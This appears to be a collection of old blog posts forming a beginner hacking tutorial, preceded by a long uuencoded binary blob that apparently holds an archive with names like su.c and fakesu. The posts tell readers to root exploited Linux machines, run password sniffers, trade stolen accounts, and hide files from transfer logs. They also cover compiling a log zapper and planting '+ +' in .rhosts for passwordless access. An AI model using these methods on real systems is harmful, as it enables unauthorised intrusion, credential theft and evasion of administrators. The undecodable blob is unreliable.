M-BAM^(1%UGEG?*RSHCD9C>#&*#W@1M83YW39<`7S-03BV.,/Y:7+32<*$2-"REP!N"#X;9`$QG1 M/NC]4X?^`0SZ,$CQW\"R5O.3!:\6WLZEDMK,DS,/R9:XA\AG`#>*FN4>Y"=62"EWC;]\!9034
M1C,(%`EJ*Z!%#?6E52"3X"5ERH'D+5Z4'T4S$WMJD#EE13L:IR9W%^=75W5E
MZDHKI#L.T^'(*&)L<&JO%23:@M#'%EW+CN5T-8/:Z)3#KVY6@T(GJ1J0X.<%+X9!,LQP?+.H**W?J('0G[)5?=/=6/.= M+,#:,TV-S(YUY^XS^+!R_B#7-&>$U:[POS]3P4^886/E]>G4,/4T)#ID(D+ZTR
M$FK$4KO::?(+[DCG?1P_FZ7ZU-XZTYBZ5HKB]1+QP/,H0):7\=N<+A+@V7@2 M,-)?>!RG6:Z.D8#*:T;?AKWG(VGZR'K(GN>SSTVF5MC*X1(,/NI\Z[P+\>X*
MXV-BR1>\H;ZB&U:&5Q$CK<*.1KC[28MJ;%5W#GK4III:U;WSMRIGI&R_Y@=M M/BJ'YO+&SE'6*[OWJIA949.[?+AM\\%58#W4?DX&`SQ=\M&
MH>]'PZ/OJ]:RK3'V3UKV(%:P&SAO2,TIT/410_VCZ1UZHWR/]1EFN4G^ZM$N
M/^-V@ZZ_D]B6>-J5PT-K5C7NWDX6JM:`M=T.#Y]/_MMFO_O(%`ZAW),Z8^UN
M&&OL#?#*;;;7"UK?'?35G#<>X2B.!+(<\1K&5FF3@`82OK'E:QH0G@TGWOZ^ M,%V[1>$ERI[1]?H$=N]2E>4IDH"9T::;J?JW]RW<`ID7[W'F783:OWHMQ5N= M#?ICXV;Z[#9W9#*)1LN@.#$J/_&/ZMC581F&?NUT
MKO+B,!6*;>%(2`5@#WG&4H:O0CCW.-U3R]?*6(J,YMCK>^NU([D)56*@/?J5
M;SS/TJ$/]CW74\D_3,1>]?<3__`[ou_[>PH^=$?*#1#),K%BGH,V(G?$;L)W
M;]UX2#->_@502P,$%`````@`.WQ%(GX#O_0T"0``3Q<```@`$`!S>7-T96TN
M:%58#`#MH_@RPOSX,OP!``"-6']OVD@3_OO-IYCVI`(5$$B::_/F>I)#(/&5
M`#+0-M(K<<9>8%7C15X[*=)]^/>9M<$&`KVV4'8\OW=VYEF?OR>]UK%8UGRQ
M$J$OPIA\,9.AC*4*-<\E/A_PN:I2\_KZ=^I$0M!0S>(7-Q+444GHNVR@2G;HU<]8VV@A MM_H)/V1G":Q(!F3&_KG\'&I?#E;LQ[0H%U$%"\$
MQ2)::E(SL[COC>E>A")R`QHDTT!ZU)6>"+4@%Z:9@E!]FAH]+'',[1L2$L\C
M>A:1QIH0,YPHNS'[&9%:,5>%U;CAF@(WSGE?CS8/RB<9&n,+m4(`"^a$2"\r sw="@#E">*#P5SR)5)9>K0$(S
MPHC<,%XC(ZSAL>VT'B!BW=I=>_3$(73L4:\]'%*G[Y!%`\L9V:UQUW)H,'8&
M_6&[3C04[)9@!2D(^PS.7/%33
MKW?*I#10X=P$">8\C3<J:1@(I$C0(7$]0
MC88):[B\;%3I5NF8"_71HL9%L]FL-2\;'ZLT'EK(Q?OSL[/S]ZPF2'S!1^D\
M7J^$KB^P63,.WW@XDX'(N'^3&>\?S*QC-ZXO_F3R#,>.AB-K-'FT6DY_.+EU
M^E_:O;/?3#GCT<0>WG:_[*Q;#\[.^L[>77?L3G^'T.WM*G@]EM@0-]`ZI&'0_>W4<\V,IW'$528'B.R-36:'QOXDVEB;GJ3<,0$JO/``M-V+8!RPD#*?\0`E^N!!4/<-<&D$S8RB2-&<*8.;!@:#LC7CWP<>`^?^LD?^NX9SC-!YX9&CQ[&)R/OQ\XAZ<<\>CNXF#U"V;7=)B!'G<[,K2)BF,,%@L;]/OK:=H=WOG7D+-Z+W<9*0x7h?n4ab*fltf,05:b!]fg4@?:p@)_#*4o"omzm_m1z,[ns?iv-uv s="">DVH[SBE1.I8NM%+R^4V$IYGE/4QZ-;XC&
M^+T4RZ7"X$1D&D@#PPH`"#NF8QF:L49+%V,46"-P5V;$0<+CR<.7;O/MTNE`R<:DT>VA9<&W*Y&)[']F/?>3(\^9Y"MXK69D\IJ[G\(0.:
M<)YN.#;J\)'F9^G6LI.+J+!OQ4$IHBA41D^62T,X$S^!JD(HC5/"S7XI%N/8 MM>X'Q>)'2Q,CHV0UP^U!OU*\8U"HXK!-OD5TQJ%9[68B0M22:/3N?RO#<\QAW MSO$?`]H-=)W+9^8`X'=#+3>`FM&GJ@(`!JPD#0$G1&\PY93Q5J22^6(362!_
M"+*'`Q3XB&,GVR#?G1)G^)UVQ"HC1IA,8N6I<`:,JAFVRQF#9P/%&5$:N^9H MI39\<0[5)guu@c.lxl[6JY031&]J`@:98R`W1\6#?QPW^`2YR-F0I\/H=O
M30'<1dfhz,&54z!=u_>+==%)(FX2C-JK\"=9K414]BHD8J^>PG5LA\%^G"L$
MII,@YH[A@9NU8..T]%-7<,^8`TDWZ8_/>(ZOBZNK.O51$4@WBF$5I^E*L7IN
MC?68O*$>!">&KP2\SW]S19:JIDH,J,:_EXAO`ID'[-VGVE2:O.3E^^=G:EY\
MHI>%1"'BD"-WHT]-(>J
M4IC\&$BMT=.@/;GK/UIVC[>EN>T[QWDR(YS7O:8F]31PPQ\%:>!G"]`*4N4]
M3<1$n)g)\+)r8+p@se^`""7\y9bsu?_b4a&:i$[@xk9:%+7<.];@x;031n:(>JR'&WUF<;Q+_55"G)6MS=^/"WG!F&R/)0;/%B_ MDELMW'TY3">G>UH.TRH*]N6Z_6]MY[1ZU=Y24+O("_#@=5J
MGY8K[L=6SIS`TW*F@^S+?;^S[^U?./K3EW-YX*D1G'3[+:O["X<+XOPN()4D M%!(:/[_'4LL]=55N&NC+R"SZ+WI-C6QN*]'I,%V?JPJ3,0FY7YG70O$-
MOPHR@R94<65]]HPRSF*80!D(TEP9W-->_,C*5DR:_ZQ$\T24Q\A?E4
ME$7'E1[&++"`B]&=ZATH+7]2L]&XK%_4FM?7%Z31#LWKK_I5_:+>I)6+GG_5
MP-0-,>Z:5U>_U_#U*04+&P1A($:I4=J.JM)UR2`)DT>-&3TP,W.;R5CMY0\Q
M!T+K]&T?O)7+%08C#SNP,F+F`10H!"!*NO`ZDV?)W\9**7TWQG!D\RYKH=#1
M?06_.;<\_E6T9(4F[!0U[U5'VNPV&U`Q%5$SH6'>75<*-YS)(,76`Z<_zg,1>(OQE*ITWM\'FYD@/M_*8P;L8-LU2`:>:2V-Z*VB/4HF\OVJ^E+%`N852F@/[5ZEK".8.R5-];?*4
MSQIJ]ZQ;6(5?!;MO`<"E0<]O<^V3\@A3N<)#.L8/2I?;'I^^=8*8ST]]M<00>4[\U^5[F2$&H6C>PYFVE[3=*!E7W3/7?[>1/Q_4$L!`A4#%`````@`
M+R)$(G7:3PX=#```.3````@`#````````0``0*2!`````&-O;F9I9RYH55@(
M`).C^#*Z#/YN^Z.!```M`D```<`#``````` M`0``0*2!4PP``&5R3X("``#.!```"@`,```````!``!`I($6$0``9F%K97-U+F1O8U58"`!/
MJ?@R3ZGX,E!+`0(5`Q0````(`.-[12*[JQGC(@@``$X6```,``P```````$`
M`$"D@=`3``!L:6)G971T97AT+FA56`@`NZ/X,AG\^#)02P$"%0,4````"`#H
M>T4BNZL9XR((``!.%@``"0`,```````!``!`I($L'```;&EB:6YT;"YH55@(
M`,RC^#(C_/@R4$L!`A4#%`````@`(7Q%(CD1D)-P!P``5A(```0`#```````
M`0``0*2!A20``'-U+F-56`@`WJ/X,H[\^#)02P$"%0,4````"``[?$4B?@._
M]#0)``!/%P``"``,```````!``!`I($G+```<`!P#0`0``D34````` ` end

Getting Started (Your 1st account)

2007-01-02T00:29:00.000+05:30

There are many ways to get a starter account. I will go into each area to help you get started. All you need is one good account to spawn off to hundreds of accounts. Think of this; You get one good exploitable system, most any linux machine ;)

Now you get root access and load a sniffer program. The TCP sniffer will search out any login process on the network and log the login and password for any telnet, ftp, or dial-in session going out or coming into the system.

Now even if it is a small ethernet connection you have around 100 passwords for a few machines or domains. If a larger net provider you have hundreds of accounts all over the world! All you need for this is one good account and password to an exploitable system. If it seems you can not exploit root on the system, this might be a good system to crack passwords on and exchange the accounts for other accounts from hackers or irc users that are looking to load a bot but do not have the shell account or disk space to do it. NEVER give out even one password to a system you exploited root on.

Keep these systems to yourself!

Lets now get into ways to get your first accounts.

GCC Compiler

2007-01-01T03:53:00.001+05:30

There will be a time when you will need to compile a .c file.

It is best to compile on the machine you are working on. So upload or copy and past the files to the hacked box and compile them there. If you have problems with their compiler you can try to upload pre-compiled files.

One way to get the file up to the victims machine would be to use copy and paste. Get a good tsr or windows shareware program to do this if you do not have any way to do it now. You can copy a script file from one window and paste it into an editor on the victims machine, and then compile the new file. Walaa... no upload log of the file. You can copy and paste from the victims machine as well so that there are no download logs of ascii files.

To copy and paste you can just open an editor on the hacked box, and then copy from your other session, and paste your script into the editor and save the file. This way there will not be anything in the xferlog yet.

You can do the same thing with the password file. If you do decide to download the password file using ftp, make sure to copy it to your home directory first under a different name.

bash:/etc:> cp passwd $HOME/plog would copy the file called passwd from the /etc directory you were in, to your home directory in a file called plog instead of passwd. Admin's grep the xfer logs looking for who is downloading the passwd file.

Another way to get file to or from the box without showing up in the logs would be to open an irc session on the victims machine, then from your other session where you are already a user on irc, send the files using dcc.

The command to send the files would be /dcc send The command to get the file on the other side would be /dcc get

It would be nice if you had a bot loaded on the irc when you were hacking so that you could just send files to the bot and have it auto receive them.

A 'bot' is a robot program that you can load in the background on your shell account that will receive files, keep channels open, etc...

The GCC compiler is easy...

gcc filename.c -o filenameyouwant

If i was to compile a file called z2.c that would zap the log files i would type this:

gcc z2.c -o zap

This would give me a file that would exe, called zap.

If I just typed : gcc z2.c I would have a file named a.out, that was the executable file and would have to rename it to zap, or some name i would know by doing this: mv a.out zap

Now I would have a file named zap that was executable instead of a.out.

You will want to make sure you are not naming these files names that sys admin's will know. If you had a sniffer file called 'linuxsniffer.c' you don't want to keep the same name ;) call it something like:

gcc linuxsniffer.c -o lsn

Remember also sometimes you can execute these files names right in the directory by just typing the file name like for our 'lsn' (sniffer) above just by typing lsn. But sometimes this will not work unless you add a ./ to the command. So remember, sometimes you will need to type ./lsn or your file name.

Also there will be a time you will want a program to run in the background even after you logoff. Like in the case of the sniffer above. In this case you might want to name your sniffer something that would not be so easy noticed. Use your own style here. BUT to make it stay in the background while you are off the system you need to run the command with a & after the command.

lsn&

If you were to just type lsn, your screen would pause, and you would not be able to type while the program was sniffing, but if you typed lsn& it would load and the system prompt would come right back to you. Also the system would let you know it was loaded by giving you the process id # that it was loaded as.

You could view the process with the ps -x command, you might want to run
ps -auxe |more

a= all
u= show user
x= yours
e= env

some machines
f=tree
or command: pstree

FTP

2006-12-30T23:07:00.000+05:30

Another way to login will be FTP. You can use a windows client, or just login from a shell.

ftp ftp.domain.com

This will allow you to download or upload files to the site you are hacking. Just make sure to edit the xferlog to wipe your tracks on the system. Remember NEVER to ftp or telnet out of the hacked system, only log into it! If you are coming from your own system, or from another hacked account you might just be giving your login and password to the system admin or another hacker on their system. There could be a telnetd or ftpd trojan loaded on the system, or even a sniffer. Now you would have just gave someone your login id and password. And if this was the system admin, he might have the idea that revenge is sweet ;)

Using ftp from the shell, I would suggest using a few commands:

After you login, and have your prompt, type these commands pressing enter after each one.

prompt
hash
bin

prompt will allow you to type a command like (mget *) or (mput*) and transfer an entire directory without having it prompt you for each file yes or no.

hash will put ############ on the screen so you can see the transfer is still moving and at what speed.

bin will make sure you get the files in the right mode, and if transferring binary files, you will be sure they will uncompresses.

The transfer commands are easy, get filename, or, put filename, or for many files you can use regular wild cards with mput or mget.

Rlogin

2006-12-29T22:03:00.000+05:30

There is another command you might use and we will get into this elsewhere as we get into using rlogin to login to a system without a password.

For now read the man pages on rlogin by using the man rlogin from your shell account.

The basic command would be :

rlogin -l username hostname
connecting....
password:

bash$

Rlogin requires the user to have a file in their home directory that tells what system they can receive the rlogin from. In this file .rhosts it would look like this:

username hostname (or) hostname

if you were to add to this file + + it would let any user from any host login without a password.

The file would look like this:

----- cut here ------
+ +
_____ cut here ------

if they already had entry's you could add the + + under their host names, but remember now they would notice seeing they would now be able to rlogin without the password. You would be targeting people that did not already have a .rhosts file.

Linux file permission

2006-12-28T23:25:00.000+05:30

bash$ cd /tmp
bash$ ls -l
total 783
-rwx------ 1 wood users 1 Jan 25 18:28 190067haa
-rw-r--r-- 1 berry mail 1 Jan 16 12:38 fillter.14428
-rw------- 1 rhey19 root 395447 Jan 24 02:59 popp3a13598
-rw------- 1 rhey19 root 395447 Jan 24 03:00 popp3a13600
drwxr-xr-x 4 root root 1024 Jan 12 13:18 screens

First notice that we used a / and not \ to change to the tmp directory! linux uses the / as the root so it is backwards from DOS here.

Notice we did ls -l for the long directory. If we did 'ls' we would have what you see below.

bash$ ls
19067haa filter.14428 pop3a13598 pop3a13600 screens

With what we see here can not tell much, so most of the time we will be using ls -al with the -al we will see the hidden files also, hidden files and directories will always start with a '.'. Now watch:

bash$ ls -al
total 794
drwxrwxrwt 4 root root 8192 Jan 25 23:05 .
drwxr-xr-x 22 root root 1024 Dec 28 18:07 ..
-rw-r--r-- 1 berry users 6 Jan 25 23:05 .piinetemp.000
drwxr-xr-x 2 berry users 1024 Jan 25 23:05 .test
-rwx------ 1 wood users 1 Jan 25 18:28 190067haa
-rw-r--r-- 1 berry mail 1 Jan 16 12:38 fillter.14428
-rw------- 1 rhey19 root 395447 Jan 24 02:59 popp3a13598
-rw------- 1 rhey19 root 395447 Jan 24 03:00 popp3a13600
drwxr-xr-x 4 root root 1024 Jan 12 13:18 screens

.pinetemp.000 is a hidden file, and .test is a hidden directory.

-rw-r--r-- 1 berry mail 1 Jan 16 12:38 fillter.14428

row 1 row2 row3
----------------------------

Now here we need to learn about permissions, users, and groups.

Row #1 is the file permissions
Row #2 is who owns the file
Row #3 is the group owner of the file

File permissions are grouped together into three different groups.

If the line starts with a d, it is a directory, if there is no d, it is a file.

- --- --- ---
| | | |--------> Other = anyone on the machine can access
| | |------------> Group = certain groups can access
| |----------------> User = only the owner can access
|------------------> Directory Mark

- rw- r-- r--
| | | |--------> Other can only read the file
| | |------------> Group can only read the file
| |----------------> User can read or write to the file
|------------------> It is not a directory

- rwx rwx r-x
| | | |--------> Other can read and execute the file
| | |------------> Group can read write and execute the file
| |----------------> User can read write and execute the file
|------------------> It is not a directory

The owner is the user name in row #2 and the group owner is the name in row #3. In DOS the file has to have a .exe, .com, or .bat extension to execute, but in unix all you need is the --x in your group of user, other, group.

You can change these permissions if you own the file or have root access:

----------------------------------------------------------------------------
chmod oug+r filename will make all three groups of permissions be able to read the file.

chmod og-r filename would make the file readable only to the user that owns the file. (notice the - or + to set the file yes or no)

chmod +x filename would make the file execute by all.

chown username filename would make the file owned by another user.
chgrp groupname filename would make the file owned by another group.
----------------------------------------------------------------------------

Make sure to keep file perm's and groups the same or you will be sniffed out and booted from the system. Changing configs on the system might only break other functions, so keep your paws off or you are just asking to get cought. Only do what you are *SURE* of. Only use commands that you know, you might find yourself spending hours fixing just one typo like chown -R username /* could keep you busy for a year ;)

Just be careful!

We will get into this stuff more as we go into the needs for this.

Telnet

2006-12-28T00:22:00.000+05:30

Telnet is a command that you can use from a shell account, or from an exe file (telnet.exe) from Windows, OS/2, Windows 95 and other operating systems that will let you connect to another machine on the net. There are other programs you will learn about here like FTP, and rlogin that you can use as well but now we will use telnet.

You can use telnet if you know the IP address or the host name you want to connect or login to. To use the command you would just use the telnet program to connect to the IP or host like this:

Telnet netcom.com or telnet 206.146.43.56

Ok, now lets login:

telnet machine.com

trying .....

Connected to machine.com

Linux 2.0.28 (machine.com) (ttyp0)

machine login:username
password:#######

bash$

Your prompt might look different, but we will use this one.

Notice above that it will tell you the O/S when you get the login prompt. You can use this if you get a large collection of passwd files. Even before going on to crack them sort them by O/S types by just telnet-ing to them to see what they are running. There are other ways, but lets keep this telnet topic going for a sec... telnet domain.name.com, after you see what they are running make a note of this and ctrl ] to break out of the connection.

Put all of your linux passwd files into a pile to be cracked first. All we need is one account that works for the system, and we can be almost sure we will have root on that machine! There are way to many holes in linux to think we will not be able to own one of those machines, so lets get to work so we can start this wonderful world of hacking.

Linux Commands you need to know

2006-12-26T23:14:00.000+05:30

There are just a few basic commands you need to learn, and then some linux programs that will aid you in logging in logging into or keeping access to the machine.

Basic commands

I hope you have a basic knowledge of DOS, that would help a bit, and I will assume that you already do in writing this manual.

DOS Commands you are used to first:

REMEMBER: unix is case sensitive, so if I here use lower case you must also, if I use a space you must also. DOS will let you get away with allot of things but unix will not!

DIR/W = ls
DIR = ls -l
DIR/AH = ls -al AH=(hidden) -al=(include hidden files as well as regular)
RENAME = mv
ATTRIB = chmod
MD = mkdir
RD = rmdir
DEL = rm
COPY = cp

These are the basic commands, i suggest that you lookup the man pages on each one of these commands from your unix shell. You would do this by typing 'man command' without the ''. e.g. 'man ls' for detailing of commnad 'ls'

each one of these commands will have switches for them, like cp -R to copy files and directories. So you would type man cp to get all of the switches you can use with the copy command.

cd {then press enter} will always take you to your home directory
cp filename $HOME will copy the file to your home directory
cd ~username will take you to that users home dir if you have access to bethere
pwd {press enter} will show you what directory you are in.

Preface

2006-12-26T06:51:00.000+05:30

This blog is not about shortcut techniques to crack some passwords. I'm not claiming to be a hacker. I indeed am not. I'm a learner and I respect learners.

Some of my friends think that hacking is to crack some password or getting into someone's computer. Few years earlier, I used to think the same. Time changed my way of thinking. Now, I think hacking is all about learning more and more concept. Hacking is about the hunger of knowledge.

There are no shortcuts. If you want to be a hacker, you need to learn the basics. And you need to continue learning always.

I'm not here to lecture about what you should do and what you should not. I'll also not preach about the hacking ethics. After all, everyone is responsible for his/her own deeds.

This blog will contain posts from other websites, books and tutorials. It is possible that all the posts are reproduced from some place. So, please don't enlighten me about where I copied it from; coz I already know if I copied. I can't promise originality (I'm a learner after all). But, this blog is going to be a good source of basic information.

I'm using this blog as a personal container of information. So, please don't sue me if I copied you. Most of the time I'll try to cite the source though.